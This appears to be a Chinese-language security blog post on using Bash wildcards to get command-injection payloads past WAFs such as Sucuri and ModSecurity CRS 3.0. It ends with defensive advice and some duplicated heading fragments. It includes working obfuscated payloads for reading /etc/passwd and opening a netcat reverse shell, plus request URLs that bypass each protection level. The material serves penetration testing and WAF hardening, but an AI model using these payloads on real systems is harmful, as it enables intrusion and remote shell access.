Bypass WAF 技巧：利用通配符绕过Web应用防火墙<\/h1>

前言<\/h2>
本文详细介绍了如何利用Linux系统中的通配符特性绕过常见的Web应用防火墙(WAF)规则集，包括Sucuri WAF和ModSecurity OWASP CRS 3.0等。通过巧妙使用通配符，攻击者可以在WAF防护下执行命令、读取敏感文件甚至获取反向shell。<\/p>

通配符基础知识<\/h2>

Bash通配符特性<\/h3>

Bash标准通配符（也称为通配模式）用于处理多个文件，主要特性包括：<\/p>

?<\/code>：匹配任意单个字符<\/li>
*<\/code>：匹配任意数量字符<\/li>

[]<\/code>：匹配指定范围内的字符<\/li>
<\/ul>
通配符执行命令示例<\/h3>


执行ls命令<\/strong>：<\/p>
\/???\/?s
<\/code><\/pre>
<\/li>

读取passwd文件<\/strong>：<\/p>
\/???\/??t \/???\/??ss??
<\/code><\/pre>
这会被解释为\/bin\/cat \/etc\/passwd<\/code><\/p>
<\/li>

执行反向shell<\/strong>：<\/p>
\/???\/n? -e \/???\/b??h 2130706433 1337
<\/code><\/pre>
其中2130706433<\/code>是127.0.0.1<\/code>的长整型表示<\/p>
<\/li>
<\/ol>
WAF绕过技术详解<\/h2>
1. 文件读取绕过<\/h3>
传统方式：<\/p>
\/bin\/cat \/etc\/passwd
<\/code><\/pre>
绕过方式：<\/p>
\/???\/??t \/???\/??ss??
<\/code><\/pre>
字符使用：\/ ? t s<\/code><\/p>
2. 反向shell绕过<\/h3>
传统方式：<\/p>
\/bin\/nc 127.0.0.1 1337
<\/code><\/pre>
绕过方式：<\/p>
\/???\/n? 2130706433 1337
<\/code><\/pre>
字符使用：\/ ? n [0-9]<\/code><\/p>
3. 文件枚举技术<\/h3>
使用echo命令枚举文件和目录：<\/p>
echo \/*\/*ss*
<\/code><\/pre>
针对不同WAF的绕过方法<\/h2>
Sucuri WAF绕过<\/h3>
Sucuri WAF通常会拦截包含\/etc\/passwd<\/code>或\/bin\/ls<\/code>等敏感路径的请求，但允许使用通配符：<\/p>
被拦截的请求：<\/p>
\/?cmd=cat+\/etc\/passwd
<\/code><\/pre>
成功绕过的请求：<\/p>
\/?cmd=%2f???%2f??t%20%2f???%2fp??s??
<\/code><\/pre>
ModSecurity OWASP CRS 3.0绕过<\/h3>
ModSecurity的防护级别分为PL0-PL4，不同级别的绕过策略：<\/p>
PL0<\/h4>
完全禁用许多规则，payload可直接执行<\/p>
PL1\/PL2<\/h4>
拦截标准OS文件访问尝试，但允许通配符：<\/p>
\/?cmd=\/???\/??t \/???\/??ss??
<\/code><\/pre>
PL3<\/h4>
会检测重复非字符，但可使用少量问号绕过：<\/p>
c=\/?in\/cat+\/et?\/passw?
<\/code><\/pre>
PL4<\/h4>
最严格级别，基本无法使用通配符绕过，因为限制了字符范围：<\/p>
ASCII: 38,44-46,48-58,61,65-90,95,97-122
<\/code><\/pre>
高级技巧<\/h2>


IP地址转换<\/strong>：<\/p>

使用长整型表示IP地址（如127.0.0.1<\/code>转为2130706433<\/code>）<\/li>
避免使用点字符.<\/code>，减少被检测风险<\/li>
<\/ul>
<\/li>

命令变体<\/strong>：<\/p>

对于不同系统的nc版本：<\/li>
<\/ul>
\/???\/?c.e \/???\/b??h 2130706433 1337
<\/code><\/pre>
<\/li>

字符限制下的payload构造<\/strong>：<\/p>

在严格字符限制下，尽量使用字母和数字构造最短路径<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>


WAF配置建议<\/strong>：<\/p>

启用最高防护级别（PL4）<\/li>
限制非必要字符的使用<\/li>
监控异常字符组合<\/li>
<\/ul>
<\/li>

应用层防护<\/strong>：<\/p>

输入验证和过滤<\/li>
最小权限原则<\/li>
避免直接执行用户输入<\/li>
<\/ul>
<\/li>

日志监控<\/strong>：<\/p>

记录所有包含通配符的请求<\/li>
设置异常请求警报<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
通配符绕过技术展示了WAF规则集的局限性，特别是在Linux系统环境下。防御者需要了解这些技术以更好地配置防护措施，而渗透测试人员则可以利用这些方法评估系统安全性。最重要的是，WAF不应是唯一的安全防线，而应作为深度防御策略的一部分。<\/p>

Bypass WAF 技巧：利用通配符绕过Web应用防火墙<\/h1>

通配符基础知识<\/h2>

针对不同WAF的绕过方法<\/h2>

ModSecurity OWASP CRS 3.0绕过<\/h3> ModSecurity的防护级别分为PL0-PL4，不同级别的绕过策略：<\/p>

PL0<\/h4> 完全禁用许多规则，payload可直接执行<\/p>

ModSecurity OWASP CRS 3.0绕过<\/h3>
ModSecurity的防护级别分为PL0-PL4，不同级别的绕过策略：<\/p>

PL0<\/h4>
完全禁用许多规则，payload可直接执行<\/p>